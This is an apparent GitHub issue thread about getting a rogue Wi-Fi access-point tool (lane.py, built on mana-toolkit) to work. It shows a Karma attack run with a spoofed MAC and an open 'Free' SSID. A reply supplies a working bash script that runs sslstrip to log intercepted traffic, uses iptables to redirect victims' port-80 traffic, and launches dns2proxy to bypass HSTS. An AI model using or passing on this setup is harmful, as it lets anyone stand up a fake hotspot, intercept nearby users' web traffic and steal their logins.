### ISSUE TITLE
problem with lane.py

### ISSUE THREAD

**Issue by rf5g** [mimimitm/mimimitm#1]
root@kali:/usr/share/mana-toolkit# ./lane.py -w wlan1 -k
Using  eth0  as Internet
Using  wlan1  as wlan interface
Using  6  as wlan channel
Using  Free  as wlan SSID
Using  1  for Karma loud
Hit Enter to continue
Current MAC:   26:28:11:ad:be:03 (unknown)
Permanent MAC: 14:cc:20:19:40:6c (TP-LINK TECHNOLOGIES CO.,LTD)
New MAC:       5a:ab:f0:2b:50:87 (unknown)
./start-nat-full.sh: line 20: ./hostapd: No such file or directory
Internet Systems Consortium DHCP Server 4.3.1
Copyright 2004-2014 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /usr/share/mana-toolkit/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
Listening on LPF/wlan1/5a:ab:f0:2b:50:87/10.0.0.0/24
Sending on   LPF/wlan1/5a:ab:f0:2b:50:87/10.0.0.0/24
Sending on   Socket/fallback/fallback-net
Hit Enter to Stop

and he stuck this plase...

**Comment by saplt** [comment]
Hi. The problem is here: 
```
./start-nat-full.sh: line 20: ./hostapd: No such file or directory
```
You should install *hostapd-karma* by **mana-toolkit** and copy it in directory with lane, or change path to hostapd bin file in *start-nat-full.sh*
By default hostapd is located in */usr/lib/mana-toolkit/hostapd*

**Comment by rf5g** [comment]
thanks for answer! it's works now but i get empty logs file (ssltrip.log.*)

**Comment by saplt** [comment]
To activate sslstrip you should use *-H* option, and make sure that **sslstrip** folder is located in one place with **lane.py**.
One more solution is change **ssltrip** and **dns2proxy** folders locations in **hstsbypass.sh** file like this:
```bash
#!/bin/bash
upstream=$(cat upstream.txt)
phy=$(cat wlan.txt)
pwd=$(pwd)
python /usr/share/mana-toolkit/sslstrip2/sslstrip.py -l 10000 -a -w $pwd/logs/sslstrip.log.`date "+%s"`&
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
python /usr/share/mana-toolkit/dns2proxy/dns2proxy.py -i $phy&
cd -
```
